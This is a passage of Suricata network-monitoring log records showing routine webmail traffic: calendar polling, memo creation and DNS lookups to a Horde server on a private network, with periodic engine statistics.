(X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:05:31.023880+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:05:31.023880+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} {"timestamp":"2020-02-29T00:05:32.000208+0000","flow_id":987695000028206,"event_type":"flow","src_ip":"192.168.10.122","src_port":51758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:31.230446+0000","end":"2020-02-29T00:00:31.336274+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:35.986970+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":2}} {"timestamp":"2020-02-29T00:05:35.990066+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:05:36.000258+0000","event_type":"stats","stats":{"uptime":13988,"capture":{"kernel_packets":133488,"kernel_drops":0},"decoder":{"pkts":133497,"bytes":92407732,"invalid":181,"ipv4":132052,"ipv6":8,"ethernet":133497,"raw":0,"null":0,"sll":0,"tcp":126959,"udp":4898,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2703,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2719,"synack":2710,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1746,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2233,"failed_udp":110},"tx":{"http":4529,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2310}},"flow_mgr":{"closed_pruned":2683,"new_pruned":15,"est_pruned":2271,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23482,"memcap_state":0,"memcap_global":0},"http":{"memuse":45335,"memcap":0}}} {"timestamp":"2020-02-29T00:05:38.000700+0000","flow_id":1694633747830855,"event_type":"flow","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1875,"bytes_toclient":5458,"start":"2020-02-29T00:04:32.088135+0000","end":"2020-02-29T00:04:37.456773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:38.003807+0000","flow_id":243338513312687,"event_type":"flow","src_ip":"192.168.10.122","src_port":43094,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:37.879535+0000","end":"2020-02-29T00:00:37.984947+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:41.000331+0000","flow_id":738608386810466,"event_type":"flow","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":19,"bytes_toserver":2955,"bytes_toclient":14491,"start":"2020-02-29T00:04:22.205410+0000","end":"2020-02-29T00:04:40.307386+0000","age":18,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:42.416658+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50875,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50574,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:42.525766+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50875,"proto":"UDP","dns":{"type":"answer","id":50574,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:42.525766+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50875,"proto":"UDP","dns":{"type":"answer","id":50574,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:42.586343+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753}} {"timestamp":"2020-02-29T00:05:42.651930+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52688,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:05:42.653306+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/memo.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":581}} {"timestamp":"2020-02-29T00:05:43.000219+0000","event_type":"stats","stats":{"uptime":13995,"capture":{"kernel_packets":133501,"kernel_drops":0},"decoder":{"pkts":133501,"bytes":92407996,"invalid":181,"ipv4":132056,"ipv6":8,"ethernet":133501,"raw":0,"null":0,"sll":0,"tcp":126963,"udp":4898,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2703,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2719,"synack":2710,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1746,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2233,"failed_udp":110},"tx":{"http":4529,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2310}},"flow_mgr":{"closed_pruned":2684,"new_pruned":15,"est_pruned":2272,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23482,"memcap_state":0,"memcap_global":0},"http":{"memuse":79941,"memcap":0}}} {"timestamp":"2020-02-29T00:05:43.001130+0000","flow_id":370778783283435,"event_type":"flow","src_ip":"192.168.10.122","src_port":53380,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:42.391403+0000","end":"2020-02-29T00:00:42.497019+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:45.000426+0000","flow_id":2022601730571069,"event_type":"flow","src_ip":"192.168.10.122","src_port":59941,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:44.604989+0000","end":"2020-02-29T00:00:44.710471+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:46.007700+0000","flow_id":1186461792399658,"event_type":"flow","src_ip":"192.168.10.122","src_port":44196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:44.913706+0000","end":"2020-02-29T00:00:45.019117+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:47.000249+0000","flow_id":2122532734704388,"event_type":"flow","src_ip":"192.168.10.122","src_port":56423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:45.989956+0000","end":"2020-02-29T00:00:46.095007+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:47.001105+0000","flow_id":1206437685387358,"event_type":"flow","src_ip":"192.168.10.122","src_port":59463,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:46.155742+0000","end":"2020-02-29T00:00:46.261061+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:47.656994+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52688,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/memo.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":581},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/js\/memo.js","state":"CLOSED","stored":false,"size":1565,"tx_id":1}} {"timestamp":"2020-02-29T00:05:50.005989+0000","event_type":"stats","stats":{"uptime":14002,"capture":{"kernel_packets":133527,"kernel_drops":0},"decoder":{"pkts":133528,"bytes":92417809,"invalid":181,"ipv4":132081,"ipv6":8,"ethernet":133528,"raw":0,"null":0,"sll":0,"tcp":126986,"udp":4900,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2704,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2720,"synack":2711,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1747,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2234,"failed_udp":110},"tx":{"http":4531,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2311}},"flow_mgr":{"closed_pruned":2685,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21827,"memcap_state":0,"memcap_global":0},"http":{"memuse":45255,"memcap":0}}} {"timestamp":"2020-02-29T00:05:51.000750+0000","flow_id":2068106924568790,"event_type":"flow","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1517,"bytes_toclient":6243,"start":"2020-02-29T00:04:40.307414+0000","end":"2020-02-29T00:04:50.024265+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:52.601288+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38270,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16280,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:52.710276+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38270,"proto":"UDP","dns":{"type":"answer","id":16280,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:52.710276+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38270,"proto":"UDP","dns":{"type":"answer","id":16280,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:52.739096+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:05:52.739096+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":12,"tx_id":0}} {"timestamp":"2020-02-29T00:05:56.666157+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:05:56.679058+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59017,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51727,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:56.787069+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59017,"proto":"UDP","dns":{"type":"answer","id":51727,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:56.787069+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59017,"proto":"UDP","dns":{"type":"answer","id":51727,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:56.852567+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:05:56.852567+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":199,"tx_id":1}} {"timestamp":"2020-02-29T00:05:56.863955+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36067,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14745,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:56.972258+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36067,"proto":"UDP","dns":{"type":"answer","id":14745,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:56.972258+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36067,"proto":"UDP","dns":{"type":"answer","id":14745,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:57.000120+0000","event_type":"stats","stats":{"uptime":14009,"capture":{"kernel_packets":133531,"kernel_drops":0},"decoder":{"pkts":133537,"bytes":92419642,"invalid":181,"ipv4":132090,"ipv6":8,"ethernet":133537,"raw":0,"null":0,"sll":0,"tcp":126993,"udp":4902,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2235,"failed_udp":110},"tx":{"http":4532,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2312}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":51120,"memcap":0}}} {"timestamp":"2020-02-29T00:05:57.055887+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5388}} {"timestamp":"2020-02-29T00:06:02.060739+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5388},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":26117,"tx_id":2}} 